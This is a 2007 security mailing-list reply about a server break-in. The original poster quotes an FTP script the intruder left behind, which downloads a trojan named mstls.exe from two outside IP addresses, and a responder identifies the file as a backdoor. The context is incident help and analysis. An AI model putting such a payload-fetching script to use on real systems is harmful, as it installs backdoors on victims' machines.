Re: what next
- From: Justin <winopride@xxxxxxxxx>
- Date: Tue, 06 Feb 2007 08:18:30 -0700
nemanja.janic@xxxxxxxxxxxxxxxxxxxx wrote:
Hello list,http://www.greatis.com/appdata/d/m/mstls.exe.htm -- Trojan/Backdoor
i wasn't sure where to post this, and since i'm just starting out in security, i figured that this is the place.
Here goes:
i've had a fine unknown gentleman enter at his will to my server; among other things he left behind a file named tt (no extension) which contained the following lines:
open 80.93.223.22 14547 user 1 1 get mstls.exe quit open 80.71.219.134 5191 user 1 1 get mstls.exe quit
I figure this is some script to be used with ftp, or at least i think so. I did tracert to those adresses, but that's where i'm stuck. What can i do next? And any idea what that mstls.exe is? I deleted it, but it was 0 bytes in size. Thanx in advance.
The file is an FTP script to StnyFtpd (for the ip address: 80.93.223.22).
Goodluck
-Justin
- Follow-Ups:
- RE: what next
- From: Murda Mcloud
- RE: what next
- References:
- what next
- From: nemanja . janic
- what next
- Prev by Date: Re: what next
- Next by Date: RE: what next
- Previous by thread: what next
- Next by thread: RE: what next
- Index(es):
